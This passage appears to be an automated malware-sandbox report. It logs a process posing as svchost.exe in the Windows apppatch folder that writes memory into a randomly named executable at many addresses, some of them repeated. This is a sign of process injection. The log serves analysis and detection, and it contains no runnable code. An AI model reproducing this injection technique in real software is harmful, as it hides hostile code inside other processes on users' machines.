Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 9A0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 9A1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 9A2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 9F4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2E40000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2E41000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2E42000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2E94000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2D80000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2D81000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2D82000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2DD4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C20000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C21000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C22000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C74000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B90000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B91000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B92000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: BE4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1020000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1021000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1022000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1074000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2340000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2341000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2342000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2394000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 3010000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 3011000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 3012000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 3064000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 850000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 851000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 852000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 8A4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2960000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2961000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2962000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 29B4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2EE4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2650000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2651000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2652000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 26A4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E40000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E41000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E42000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E94000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: A40000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: A41000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: A42000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: A94000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B00000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B01000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B02000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B54000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2880000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2881000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2882000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 28D4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2C70000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2C71000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2C72000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2CC4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2DD0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2DD1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2DD2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2E24000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: BA0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: BA1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: BA2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: BF4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1320000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1321000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1322000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1374000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: BA0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: BA1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: BA2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: BF4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2F40000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2F41000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2F42000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2F94000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BA0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BA1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BA2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BF4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D50000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D51000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D52000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DA4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2CB0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2CB1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2CB2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2D04000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2FB0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2FB1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2FB2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 3004000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2340000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2341000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2342000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2394000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 24E0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 24E1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 24E2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2534000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: FF0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: FF1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: FF2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1044000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DB0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DB1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DB2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E04000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2550000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2551000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2552000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 25A4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2490000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2491000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2492000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 24E4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2920000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2921000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2922000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2974000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1330000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1331000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1332000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1384000	Jump to behavior
